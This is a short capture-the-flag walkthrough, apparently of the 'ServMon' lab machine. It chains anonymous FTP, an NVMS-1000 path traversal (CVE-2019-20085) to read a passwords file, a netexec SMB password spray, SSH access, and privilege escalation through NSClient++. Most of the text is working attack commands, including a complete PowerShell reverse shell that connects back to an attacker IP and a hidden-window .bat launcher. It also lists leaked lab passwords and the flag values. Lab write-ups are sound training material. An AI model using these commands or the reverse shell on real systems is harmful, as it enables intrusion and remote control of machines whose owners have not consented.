
Rustscan
rustscan --ulimit 5000 -a 10.129.227.77 -- -sV -sC
FTP
ftp anonymous@10.129.227.77
Nadine
Nathan
Nadine Share – Confidential.txt
Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it
yourself and place it back into the secure folder.
Regards
Nadine
Nathan Share– Notes to do.txt
Notes to do.txt 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
Googling NMVS you eventually locate this python script: NVMS1000-Exploit
Host is vulnerable to path traversal CVE-2019-20085 Located User Credentials in ../../../../../../../../users/nathan/desktop/passwords.txt 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
Netexec
Password spray found credentials netexec smb 10.129.227.77 -u nadine -p passwords.txt - ServMon\nadine:L1k3B1gBut7s@W0rk smbmap -u 'nadine' -p "L1k3B1gBut7s@W0rk" -H 10.129.227.77
SSH
SSH As Nadine ssh nadine@10.129.227.77 L1k3B1gBut7s@W0rk
User Flag sb109fddcc69dba6ff8b27b73bb90e5f5
Enumeration
ExploitDB-46802 ew2x6SsGTxjRwXOT
#create .bat file
powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file “c:\temp\reverse.ps1”
“powershell #1 $LHOST = “10.10.14.118”; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write(“$Outputn”); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
With Proxy running go to https[:]localhost:8443 1. Settings > Settings > scripts > add new 2. set section to '/settings/external scripts/scripts/powershell' 3. set command to 'command' 4. set key to 'path of ps1 e.g., c:\temp\test.ps1' 5. save 6. control > reload 7. navigate to queries > script name 8. Run after starting netcat listener
Root.txt 8ab637b9bd6d7848f602532cdb57d9cd